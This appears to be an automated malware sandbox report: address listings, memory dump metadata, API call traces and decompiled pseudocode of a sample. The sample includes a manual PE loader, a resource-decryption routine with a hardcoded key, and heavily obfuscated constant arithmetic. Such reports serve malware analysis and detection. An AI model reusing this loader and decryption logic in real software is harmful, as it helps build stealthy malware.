                                                      0x00233b2a
                                                      0x00233b35
                                                      0x00233b40
                                                      0x00233b53
                                                      0x00233b54
                                                      0x00233b5b
                                                      0x00233b63
                                                      0x00233b6e
                                                      0x00233b81
                                                      0x00233b90
                                                      0x00233b97
                                                      0x00233ba2
                                                      0x00233bad
                                                      0x00233bc1
                                                      0x00233bd0
                                                      0x00233bd7
                                                      0x00233be2
                                                      0x00233bef
                                                      0x00233bf3
                                                      0x00233bfd
                                                      0x00233c01
                                                      0x00233c09
                                                      0x00233c11
                                                      0x00233c16
                                                      0x00233c1e
                                                      0x00233c26
                                                      0x00233c2e
                                                      0x00233c41
                                                      0x00233c48
                                                      0x00233c53
                                                      0x00233c5e
                                                      0x00233c69
                                                      0x00233c71
                                                      0x00233c79
                                                      0x00233c7e
                                                      0x00233c86
                                                      0x00233c8e
                                                      0x00233c99
                                                      0x00233ca4
                                                      0x00233caf
                                                      0x00233cba
                                                      0x00233cc5
                                                      0x00233ccd
                                                      0x00233cd8
                                                      0x00233ce3
                                                      0x00233ceb
                                                      0x00233cf6
                                                      0x00233d01
                                                      0x00233d14
                                                      0x00233d23
                                                      0x00233d2a
                                                      0x00233d32
                                                      0x00233d3d
                                                      0x00233d48
                                                      0x00233d50
                                                      0x00233d5b
                                                      0x00233d66
                                                      0x00233d6e
                                                      0x00233d7b
                                                      0x00233d8f
                                                      0x00233d9b
                                                      0x00233da2
                                                      0x00233dad
                                                      0x00233db8
                                                      0x00233dc3
                                                      0x00233dce
                                                      0x00233dd9
                                                      0x00233de4
                                                      0x00233df9
                                                      0x00233e01
                                                      0x00233e08
                                                      0x00233e13
                                                      0x00233e2a
                                                      0x00233e2e
                                                      0x00233e36
                                                      0x00233e3b
                                                      0x00233e43
                                                      0x00233e56
                                                      0x00233e65
                                                      0x00233e6c
                                                      0x00233e77
                                                      0x00233e7f
                                                      0x00233e87
                                                      0x00233e8f
                                                      0x00233e97
                                                      0x00233e9f
                                                      0x00233eaa
                                                      0x00233eb2
                                                      0x00233ec6
                                                      0x00233ecd
                                                      0x00233ed8
                                                      0x00233ee3
                                                      0x00233ef6
                                                      0x00233efd
                                                      0x00233f08
                                                      0x00233f08
                                                      0x00233f0d
                                                      0x00233f0d
                                                      0x00233f0d
                                                      0x00233f0d
                                                      0x00233f13
                                                      0x00233f13
                                                      0x00233f19
                                                      0x00233f19
                                                      0x00234295
                                                      0x00234297
                                                      0x002342cb
                                                      0x002342d4
                                                      0x002342dc
                                                      0x00233f0d
                                                      0x00233f0d
                                                      0x00233f0d
                                                      0x00233f13
                                                      0x00233f13
                                                      0x00000000
                                                      0x00233f13
                                                      0x00233f0d
                                                      0x002342a7
                                                      0x002342b0
                                                      0x002342b2
                                                      0x0023411e
                                                      0x0023411e
                                                      0x00233f0d
                                                      0x00233f0d
                                                      0x00233f0d
                                                      0x00233f13
                                                      0x00233f13
                                                      0x00000000
                                                      0x00233f13
                                                      0x00000000
                                                      0x00233f0d
                                                      0x00233f1f
                                                      0x00233f25
                                                      0x00234129
                                                      0x0023412f
                                                      0x002341a9
                                                      0x002341af
                                                      0x00234278
                                                      0x0023427f
                                                      0x00000000
                                                      0x0023427f
                                                      0x002341b5
                                                      0x002341bb
                                                      0x0023424e
                                                      0x00234255
                                                      0x00000000
                                                      0x00234255
                                                      0x002341bd
                                                      0x002341c3
                                                      0x00234214
                                                      0x0023421f
                                                      0x00234227
                                                      0x00000000
                                                      0x00234227
                                                      0x002341c5
                                                      0x002341cb
                                                      0x00000000
                                                      0x00000000
                                                      0x002341df
                                                      0x002341e8
                                                      0x002341f0
                                                      0x00000000
                                                      0x002341f0
                                                      0x00234131
                                                      0x00234837
                                                      0x00234851
                                                      0x00234858
                                                      0x00234858
                                                      0x00234137
                                                      0x0023413d
                                                      0x0023419a
                                                      0x0023419f
                                                      0x00000000
                                                      0x0023419f
                                                      0x0023413f
                                                      0x00234145
                                                      0x00234184
                                                      0x00234189
                                                      0x00000000
                                                      0x00234189
                                                      0x00234147
                                                      0x0023414d
                                                      0x0023416c
                                                      0x00000000
                                                      0x0023416c
                                                      0x0023414f
                                                      0x00234155
                                                      0x00000000
                                                      0x00000000
                                                      0x00234162
                                                      0x00000000
                                                      0x00234162
                                                      0x00233f2b
                                                      0x0023410d
                                                      0x00234116
                                                      0x00234118
                                                      0x00234118
                                                      0x00000000
                                                      0x00234118
                                                      0x00233f31
                                                      0x00233f37
                                                      0x00233ffd
                                                      0x00234003
                                                      0x002340ea
                                                      0x002340f5
                                                      0x002340fc
                                                      0x00000000
                                                      0x002340fc
                                                      0x00234009
                                                      0x0023400f
                                                      0x002340c9
                                                      0x002340ce
                                                      0x002340d5
                                                      0x00000000
                                                      0x002340d5
                                                      0x00234015
                                                      0x0023401b
                                                      0x0023405c
                                                      0x00234069
                                                      0x00234074
                                                      0x00234079
                                                      0x0023407c
                                                      0x0023407e
                                                      0x002340b4
                                                      0x002340b4
                                                      0x00000000
                                                      0x002340b4
                                                      0x00234080
                                                      0x00234096
                                                      0x0023409d
                                                      0x002340a3
                                                      0x002340aa
                                                      0x00000000
                                                      0x002340aa
                                                      0x0023401d
                                                      0x00234023
                                                      0x00000000
                                                      0x00000000
                                                      0x00234034
                                                      0x00234042
                                                      0x0023404b
                                                      0x0023404b
                                                      0x00000000
                                                      0x0023404b
                                                      0x00233f3d
                                                      0x00233fee
                                                      0x00233ff3
                                                      0x00000000
                                                      0x00233ff3
                                                      0x00233f49
                                                      0x00233fdd
                                                      0x00000000
                                                      0x00233fdd
                                                      0x00233f55
                                                      0x00233fc7
                                                      0x00233fcc
                                                      0x00233fd3
                                                      0x00000000
                                                      0x00233fd3
                                                      0x00233f5d
                                                      0x00233faf
                                                      0x00000000
                                                      0x00233faf
                                                      0x00233f65
                                                      0x00233f98
                                                      0x00233f9d
                                                      0x00233f9f
                                                      0x00000000
                                                      0x00233fa5
                                                      0x00233fa5
                                                      0x00000000
                                                      0x00233fa5
                                                      0x00233f9f
                                                      0x00233f6d
                                                      0x00000000
                                                      0x00233f73
                                                      0x00233f81
                                                      0x00233f86
                                                      0x00000000
                                                      0x00233f86
                                                      0x002342e7
                                                      0x002342e7
                                                      0x002342ed
                                                      0x00234632
                                                      0x00234638
                                                      0x00234736
                                                      0x0023473c
                                                      0x00234818
                                                      0x0023481d
                                                      0x00000000
                                                      0x0023481d
                                                      0x00234742
                                                      0x00234748
                                                      0x002347b9
                                                      0x002347dc
                                                      0x002347e1
                                                      0x002347f2
                                                      0x00234800
                                                      0x00234807
                                                      0x00000000
                                                      0x00234807
                                                      0x0023474a
                                                      0x00234750
                                                      0x00234778
                                                      0x00234783
                                                      0x00000000
                                                      0x00234783
                                                      0x00234752
                                                      0x00234758
                                                      0x00000000
                                                      0x00000000
                                                      0x00234769
                                                      0x0023476e
                                                      0x00000000
                                                      0x0023476e
                                                      0x0023463e
                                                      0x0023471a
                                                      0x00234725
                                                      0x0023472c
                                                      0x00000000
                                                      0x0023472c
                                                      0x00234644
                                                      0x0023464a
                                                      0x002346f7
                                                      0x002346fc
                                                      0x002346fe
                                                      0x00000000
                                                      0x00000000
                                                      0x00234704
                                                      0x00000000
                                                      0x00234704
                                                      0x00234650
                                                      0x00234656
                                                      0x002346d2
                                                      0x002346e0
                                                      0x00000000
                                                      0x002346e6
                                                      0x00234658
                                                      0x0023465e
                                                      0x0023468a
                                                      0x00234691
                                                      0x00234697
                                                      0x00234699
                                                      0x0023469b
                                                      0x002346a3
                                                      0x002346b3
                                                      0x002346ba
                                                      0x002346ba
                                                      0x00000000
                                                      0x002346ba
                                                      0x00234660
                                                      0x00234666
                                                      0x00000000
                                                      0x00000000
                                                      0x00234670
                                                      0x00234675
                                                      0x00000000
                                                      0x00234675
                                                      0x002342f3
                                                      0x0023461d
                                                      0x00234628
                                                      0x00000000
                                                      0x00234628
                                                      0x002342f9
                                                      0x002342ff
                                                      0x00234463
                                                      0x00234469
                                                      0x0023453f
                                                      0x0023454d
                                                      0x00234551
                                                      0x00234558
                                                      0x0023455f
                                                      0x00234567
                                                      0x00234568
                                                      0x0023456d
                                                      0x00234570
                                                      0x00234572
                                                      0x002345c8
                                                      0x002345fb
                                                      0x00234600
                                                      0x00234605
                                                      0x00234610
                                                      0x00234615
                                                      0x00234574
                                                      0x00234578
                                                      0x002345a2
                                                      0x002345a7
                                                      0x002345ac
                                                      0x002345b3
                                                      0x002345b5
                                                      0x002345b7
                                                      0x002345bc
                                                      0x002345bc
                                                      0x00233f08
                                                      0x00233f08
                                                      0x00000000
                                                      0x00233f08
                                                      0x00233f08
                                                      0x0023446f
                                                      0x00234475
                                                      0x002344f3
                                                      0x0023451d
                                                      0x00234522
                                                      0x00234527
                                                      0x0023452e
                                                      0x00234530
                                                      0x00234532
                                                      0x00234537
                                                      0x00000000
                                                      0x00234537
                                                      0x00234477
                                                      0x0023447d
                                                      0x002344d6
                                                      0x002344db
                                                      0x002344e2
                                                      0x00000000
                                                      0x002344e2
                                                      0x0023447f
                                                      0x00234485
                                                      0x00000000
                                                      0x00000000
                                                      0x00234499
                                                      0x002344ac
                                                      0x002344b5
                                                      0x002344bd
                                                      0x00000000
                                                      0x002344bd
                                                      0x00234305
                                                      0x002343e8
                                                      0x002343e8
                                                      0x002343ea
                                                      0x0023441b
                                                      0x00234427
                                                      0x0023442e
                                                      0x00234437
                                                      0x0023443e
                                                      0x00234440
                                                      0x00000000
                                                      0x00000000
                                                      0x0023444a
                                                      0x0023444f
                                                      0x00234451
                                                      0x00234459
                                                      0x00234459
                                                      0x00000000
                                                      0x00234459
                                                      0x00234453
                                                      0x00000000
                                                      0x00000000
                                                      0x00234455
                                                      0x00234457
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00234457
                                                      0x002343ec
                                                      0x002343ec
                                                      0x00000000
                                                      0x002343ec
                                                      0x0023430b
                                                      0x0023430d
                                                      0x0023484c
                                                      0x00000000
                                                      0x0023484c
                                                      0x00234313
                                                      0x00234319
                                                      0x002343c3
                                                      0x002343c8
                                                      0x002343ca
                                                      0x00000000
                                                      0x00000000
                                                      0x002343d7
                                                      0x002343dc
                                                      0x00000000
                                                      0x002343dc
                                                      0x0023431f
                                                      0x00234325
                                                      0x0023436c
                                                      0x00234377
                                                      0x0023437e
                                                      0x00234380
                                                      0x00000000
                                                      0x00000000
                                                      0x00234394
                                                      0x00234399
                                                      0x002343a1
                                                      0x002343a6
                                                      0x002343ac
                                                      0x002343b4
                                                      0x002343b4
                                                      0x00000000
                                                      0x002343a6
                                                      0x00234327
                                                      0x0023432d
                                                      0x00000000
                                                      0x00000000
                                                      0x0023433e
                                                      0x0023434c
                                                      0x00234353
                                                      0x00234353
                                                      0x00234822
                                                      0x00234822
                                                      0x00000000
                                                      0x0023482e

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: );$+!$,Bb*$0vkX$71##$71##$71##$71##$7Y$;R,]$=<$C!)$D'k.$D'k.$D>$DP$FM$G"$I]$P&$QG)}$T5W$[ $\$$bY$c$d3$jd$kU$nY$n\$nlvJ$ny$o4-($o4-($o$yI$}%$~$=$q$u$k
                                                      • API String ID: 0-1872862241
                                                      • Opcode ID: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
                                                      • Instruction ID: daba2ee547ca6feaad999e9b2e4adc7da7e2402ee05818fcb828c7da64c631ab
                                                      • Opcode Fuzzy Hash: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
                                                      • Instruction Fuzzy Hash: 08D213B15193818BD378DF25C58ABDFBBE1BBC4304F10891DE19A862A0DBB49959CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 100011C0, Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 177encryptionmemorylibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(00000000,00000009,00003000,00000004), ref: 1000120D
                                                      • GetModuleHandleExA.KERNEL32(00000000,00000000,00000000), ref: 1000122B
                                                      • VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004,00000000,00000000,00000000), ref: 1000123F
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000126E
                                                      • VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004), ref: 10001280
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 100012A9
                                                        • Part of subcall function 10001A10: SetLastError.KERNEL32(0000007F), ref: 10001A29
                                                      • LdrFindResource_U.NTDLL(10000000,00000007,00000000), ref: 100012CB
                                                      • LdrAccessResource.NTDLL(10000000,?,00000000,00000000), ref: 100012E5
                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000000), ref: 100012FD
                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000008), ref: 1000130D
                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 10001320
                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 1000133A
                                                      • CryptHashData.ADVAPI32(?,jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx,0000002A,00000001), ref: 10001354
                                                      • CryptDeriveKey.ADVAPI32(?,00006801,?,00000001,?), ref: 1000136F
                                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000000), ref: 10001391
                                                      • _memmove.LIBCMT ref: 1000139C
                                                      • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 100013B5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: Crypt$AllocVirtual$AcquireContext$AddressHashProc$AccessCreateDataDeriveEncryptErrorFindHandleLastModuleResourceResource__memmove
                                                      • String ID: Control_RunDLL$LdrAccessResource$LdrFindResource_U$jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx$ntdll.dll
                                                      • API String ID: 2007481169-3150289311
                                                      • Opcode ID: ab3823a83ee01bd1bc3d7bea12b07bca12ff485c0a35c74fc16e9d1a63149cf3
                                                      • Instruction ID: a3675f4d503a69c22f59064f11fbc194b2fe3a8f938d4bec1e3a9f9fa3db5d27
                                                      • Opcode Fuzzy Hash: ab3823a83ee01bd1bc3d7bea12b07bca12ff485c0a35c74fc16e9d1a63149cf3
                                                      • Instruction Fuzzy Hash: 71515071940219BAFB11EBA1CC45FEEBBB8EF19780F014156F604B61E4EBB1A545CB70
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 10001B30, Relevance: 18.3, APIs: 12, Instructions: 256COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 90%
                                                      			E10001B30(intOrPtr __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v44;
				char _v48;
				signed int _t67;
				void* _t72;
				long _t74;
				void* _t86;
				void* _t89;
				void* _t90;
				void* _t95;
				intOrPtr _t98;
				intOrPtr* _t100;
				void* _t109;
				intOrPtr _t111;
				void* _t112;
				intOrPtr _t113;
				void* _t114;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr* _t128;
				intOrPtr* _t129;
				signed int _t131;
				intOrPtr _t133;
				signed int _t135;
				long _t138;
				long _t139;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t150;

				_t113 = _a8;
				_t147 = 0;
				_v8 = __ecx;
				if(_t113 >= 0x40) {
					_t129 = _a4;
					if( *_t129 == 0x5a4d) {
						_t117 =  *((intOrPtr*)(_t129 + 0x3c));
						if(_t113 < _t117 + 0xf8) {
							goto L1;
						} else {
							_t114 = _t117 + _t129;
							if( *((intOrPtr*)(_t117 + _t129)) != 0x4550 ||  *((intOrPtr*)(_t114 + 4)) != 0x14c || ( *(_t114 + 0x38) & 0x00000001) != 0) {
								goto L3;
							} else {
								_t12 = _t114 + 0x14; // 0xc033cd33
								_t67 =  *_t12 & 0x0000ffff;
								_t13 = _t114 + 6; // 0xe8ef4d8d
								_t135 =  *_t13 & 0x0000ffff;
								if(_t135 != 0) {
									_t14 = _t114 + 0x24; // 0x100013ef
									_t128 = _t14 + _t67;
									do {
										_t15 = _t128 + 4; // 0x12f7805
										_t133 =  *_t15;
										_t111 =  *_t128;
										if(_t133 != 0) {
											_t112 = _t111 + _t133;
										} else {
											_t16 = _t114 + 0x38; // 0xff1075ff
											_t112 = _t111 +  *_t16;
										}
										_t147 =  >  ? _t112 : _t147;
										_t128 = _t128 + 0x28;
										_t135 = _t135 - 1;
									} while (_t135 != 0);
								}
								_push( &_v48); // executed
								L100037FA(); // executed
								_t118 = _v44;
								_t19 = _t118 - 1; // -1
								_t20 = _t114 + 0x50; // 0xcc25d
								_t21 = _t118 - 1; // -1
								_t22 = _t118 - 1; // -1
								_t131 =  !_t21;
								_t138 = _t19 +  *_t20 & _t131;
								if(_t138 == (_t22 + _t147 & _t131)) {
									_t23 = _t114 + 0x34; // 0xec8b55cc, executed
									_t72 = VirtualAlloc( *_t23, _t138, 0x3000, 4); // executed
									_t148 = _t72;
									_v12 = _t148;
									if(_t148 != 0) {
										L18:
										_t74 = HeapAlloc(GetProcessHeap(), 8, 0x34);
										_t139 = _t74;
										if(_t139 != 0) {
											 *(_t139 + 4) = _t148;
											_t27 = _t114 + 0x16; // 0xe85ec033
											 *(_t139 + 0x14) = ( *_t27 & 0x0000ffff) >> 0x0000000d & 0x00000001;
											 *((intOrPtr*)(_t139 + 0x1c)) = _a12;
											 *((intOrPtr*)(_t139 + 0x20)) = _a16;
											 *((intOrPtr*)(_t139 + 0x24)) = _a20;
											 *((intOrPtr*)(_t139 + 0x28)) = _a24;
											 *((intOrPtr*)(_t139 + 0x30)) = _v44;
											_t40 = _t114 + 0x54; // 0xec8b55cc
											if(E100015F0(_a8,  *_t40) == 0) {
												L36:
												_t115 = _v8;
												goto L37;
											} else {
												_t42 = _t114 + 0x54; // 0xec8b55cc
												_t86 = VirtualAlloc(_t148,  *_t42, 0x1000, 4);
												_t43 = _t114 + 0x54; // 0xec8b55cc
												_t149 = _t86;
												E10001F40(_t149, _a4,  *_t43);
												_t89 =  *((intOrPtr*)(_a4 + 0x3c)) + _t149;
												_t150 = _v12;
												 *_t139 = _t89;
												 *((intOrPtr*)(_t89 + 0x34)) = _t150;
												_t90 = E10001620(_a4, _a8, _t114, _t139); // executed
												if(_t90 == 0) {
													goto L36;
												} else {
													_t52 = _t114 + 0x34; // 0xec8b55cc
													_t93 =  *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52;
													_t115 = _v8;
													if( *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52) {
														 *((intOrPtr*)(_t139 + 0x18)) = 1;
													} else {
														 *((intOrPtr*)(_t139 + 0x18)) = E10001E90(_t139, _t93);
													}
													if(E10001470(_t115, _t139) == 0) {
														L37:
														E10001980(_t139);
														return 0;
													} else {
														_t95 = E10001830(_t115, _t139); // executed
														if(_t95 == 0 || E10001730(_t139) == 0) {
															goto L37;
														} else {
															_t98 =  *((intOrPtr*)( *_t139 + 0x28));
															if(_t98 == 0) {
																 *((intOrPtr*)(_t139 + 0x2c)) = 0;
																return _t139;
															} else {
																_t100 = _t98 + _t150;
																if( *(_t139 + 0x14) == 0) {
																	 *((intOrPtr*)(_t139 + 0x2c)) = _t100;
																	return _t139;
																} else {
																	_push(0);
																	_push(1);
																	_push(0x10000000);
																	if( *_t100() != 0) {
																		 *((intOrPtr*)(_t139 + 0x10)) = 1;
																		return _t139;
																	} else {
																		SetLastError(0x45a);
																		E10001980(_t139);
																		return 0;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											VirtualFree(_t148, _t74, 0x8000);
											goto L20;
										}
									} else {
										_t109 = VirtualAlloc(_t72, _t138, 0x3000, 4); // executed
										_t148 = _t109;
										_v12 = _t109;
										if(_t148 == 0) {
											L20:
											SetLastError(0xe);
											return 0;
										} else {
											goto L18;
										}
									}
								} else {
									SetLastError(0xc1);
									return 0;
								}
							}
						}
					} else {
						L3:
						SetLastError(0xc1);
						return 0;
					}
				} else {
					L1:
					SetLastError(0xd);
					return 0;
				}
			}



































                                                      0x10001b37
                                                      0x10001b3b
                                                      0x10001b3d
                                                      0x10001b43
                                                      0x10001b57
                                                      0x10001b62
                                                      0x10001b79
                                                      0x10001b84
                                                      0x00000000
                                                      0x10001b86
                                                      0x10001b8d
                                                      0x10001b90
                                                      0x00000000
                                                      0x10001ba3
                                                      0x10001ba3
                                                      0x10001ba3
                                                      0x10001ba8
                                                      0x10001ba8
                                                      0x10001bae
                                                      0x10001bb0
                                                      0x10001bb3
                                                      0x10001bb5
                                                      0x10001bb5
                                                      0x10001bb5
                                                      0x10001bb8
                                                      0x10001bbc
                                                      0x10001bc3
                                                      0x10001bbe
                                                      0x10001bbe
                                                      0x10001bbe
                                                      0x10001bbe
                                                      0x10001bc7
                                                      0x10001bca
                                                      0x10001bcd
                                                      0x10001bcd
                                                      0x10001bb5
                                                      0x10001bd3
                                                      0x10001bd4
                                                      0x10001bd9
                                                      0x10001bdc
                                                      0x10001bdf
                                                      0x10001be2
                                                      0x10001be5
                                                      0x10001be8
                                                      0x10001bec
                                                      0x10001bf2
                                                      0x10001c12
                                                      0x10001c15
                                                      0x10001c1b
                                                      0x10001c1d
                                                      0x10001c22
                                                      0x10001c3c
                                                      0x10001c47
                                                      0x10001c4d
                                                      0x10001c51
                                                      0x10001c73
                                                      0x10001c76
                                                      0x10001c83
                                                      0x10001c89
                                                      0x10001c8f
                                                      0x10001c95
                                                      0x10001c9b
                                                      0x10001ca1
                                                      0x10001ca4
                                                      0x10001cb1
                                                      0x10001db9
                                                      0x10001db9
                                                      0x00000000
                                                      0x10001cb7
                                                      0x10001cbe
                                                      0x10001cc2
                                                      0x10001cc8
                                                      0x10001ccb
                                                      0x10001cd1
                                                      0x10001ce2
                                                      0x10001ce4
                                                      0x10001cec
                                                      0x10001cef
                                                      0x10001cf2
                                                      0x10001cf9
                                                      0x00000000
                                                      0x10001cff
                                                      0x10001d04
                                                      0x10001d04
                                                      0x10001d07
                                                      0x10001d0a
                                                      0x10001d1a
                                                      0x10001d0c
                                                      0x10001d15
                                                      0x10001d15
                                                      0x10001d2b
                                                      0x10001dbc
                                                      0x10001dbf
                                                      0x10001dcc
                                                      0x10001d31
                                                      0x10001d34
                                                      0x10001d3b
                                                      0x00000000
                                                      0x10001d49
                                                      0x10001d4b
                                                      0x10001d50
                                                      0x10001da7
                                                      0x10001db6
                                                      0x10001d52
                                                      0x10001d52
                                                      0x10001d58
                                                      0x10001d99
                                                      0x10001da4
                                                      0x10001d5a
                                                      0x10001d5a
                                                      0x10001d5c
                                                      0x10001d5e
                                                      0x10001d67
                                                      0x10001d87
                                                      0x10001d96
                                                      0x10001d69
                                                      0x10001d6e
                                                      0x10001d77
                                                      0x10001d84
                                                      0x10001d84
                                                      0x10001d67
                                                      0x10001d58
                                                      0x10001d50
                                                      0x10001d3b
                                                      0x10001d2b
                                                      0x10001cf9
                                                      0x10001c53
                                                      0x10001c5a
                                                      0x00000000
                                                      0x10001c5a
                                                      0x10001c24
                                                      0x10001c2d
                                                      0x10001c33
                                                      0x10001c35
                                                      0x10001c3a
                                                      0x10001c60
                                                      0x10001c62
                                                      0x10001c70
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x10001c3a
                                                      0x10001bf4
                                                      0x10001bf9
                                                      0x10001c07
                                                      0x10001c07
                                                      0x10001bf2
                                                      0x10001b90
                                                      0x10001b64
                                                      0x10001b64
                                                      0x10001b69
                                                      0x10001b76
                                                      0x10001b76
                                                      0x10001b45
                                                      0x10001b45
                                                      0x10001b47
                                                      0x10001b54
                                                      0x10001b54

                                                      APIs
                                                      • SetLastError.KERNEL32(0000000D,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B47
                                                      • SetLastError.KERNEL32(000000C1,00000000,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000,?,100013CB,00000000,00000000), ref: 10001B69
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID:
                                                      • API String ID: 1452528299-0
                                                      • Opcode ID: 0e9596fd0e00a28270cdeae167b1d017198df9441bd56490207fb2c6c147fb2d
                                                      • Instruction ID: dde5234afa376a0e77413f1c03799da7f4dedddb12eec0223d0ea39616f97933
                                                      • Opcode Fuzzy Hash: 0e9596fd0e00a28270cdeae167b1d017198df9441bd56490207fb2c6c147fb2d
                                                      • Instruction Fuzzy Hash: EC81D036700215ABEB00DF69DC80BE9B7E8FB88391F10416AFD04DB246E731E955CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00244B41, Relevance: 15.2, Strings: 12, Instructions: 226COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E00244B41() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _t200;
				signed int _t202;
				signed int _t206;
				void* _t210;
				signed int _t211;
				signed int _t212;
				void* _t214;
				signed int _t216;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				void* _t245;
				signed int* _t247;
				void* _t249;

				_t247 =  &_v592;
				_v592 = 0xe399;
				_v592 = _v592 << 2;
				_t214 = 0xf501058;
				_v592 = _v592 << 0xe;
				_v592 = _v592 ^ 0xe399001c;
				_v588 = 0x8f0f;
				_v588 = _v588 * 0x29;
				_t245 = 0;
				_v588 = _v588 ^ 0x0016e94e;
				_v568 = 0x725;
				_t239 = 0x36;
				_v568 = _v568 / _t239;
				_t240 = 0xc;
				_v568 = _v568 * 0x63;
				_v568 = _v568 << 8;
				_v568 = _v568 ^ 0x000ca091;
				_v532 = 0x951;
				_v532 = _v532 << 7;
				_v532 = _v532 ^ 0x0004989a;
				_v524 = 0x2ad;
				_v524 = _v524 | 0xf8213247;
				_v524 = _v524 ^ 0xf82150c2;
				_v548 = 0x8830;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 >> 0xf;
				_v548 = _v548 ^ 0x00006238;
				_v588 = 0xba20;
				_v588 = _v588 | 0x721cc32f;
				_v588 = _v588 ^ 0x721c8c06;
				_v580 = 0x8092;
				_v580 = _v580 + 0xfffffe56;
				_v580 = _v580 / _t240;
				_v580 = _v580 >> 3;
				_v580 = _v580 ^ 0x000005b6;
				_v540 = 0xe99f;
				_v540 = _v540 + 0xfffff8d3;
				_v540 = _v540 | 0x984d7063;
				_v540 = _v540 ^ 0x984d8ec7;
				_v556 = 0xc4eb;
				_t241 = 0x4e;
				_v556 = _v556 * 0x5c;
				_v556 = _v556 + 0x75ac;
				_v556 = _v556 ^ 0x00477921;
				_v536 = 0x9b3b;
				_v536 = _v536 + 0xaa1d;
				_v536 = _v536 ^ 0x00012776;
				_v572 = 0x8e84;
				_v572 = _v572 * 0x29;
				_v572 = _v572 / _t241;
				_v572 = _v572 >> 0xa;
				_v572 = _v572 ^ 0x000020e9;
				_v528 = 0xcb2d;
				_t242 = 0x21;
				_v528 = _v528 / _t242;
				_v528 = _v528 ^ 0x00001b4e;
				_v544 = 0x6df7;
				_v544 = _v544 ^ 0x414c8853;
				_t243 = 0x49;
				_v544 = _v544 * 0x75;
				_v544 = _v544 ^ 0xd824a1d7;
				_v552 = 0xc4f0;
				_v552 = _v552 ^ 0x9d070a5f;
				_v552 = _v552 + 0xffff498d;
				_v552 = _v552 ^ 0x9d0763b6;
				_v564 = 0xe384;
				_v564 = _v564 ^ 0xde12aa62;
				_v564 = _v564 | 0x2c019ae9;
				_v564 = _v564 ^ 0xa4e5f9a5;
				_v564 = _v564 ^ 0x5af67a61;
				_v576 = 0x7d9f;
				_v576 = _v576 + 0x6134;
				_v576 = _v576 | 0x6ccc595a;
				_v576 = _v576 ^ 0x0058e7ee;
				_v576 = _v576 ^ 0x6c9448a2;
				_v592 = 0x396f;
				_v592 = _v592 * 7;
				_v592 = _v592 ^ 0x10cc7cbf;
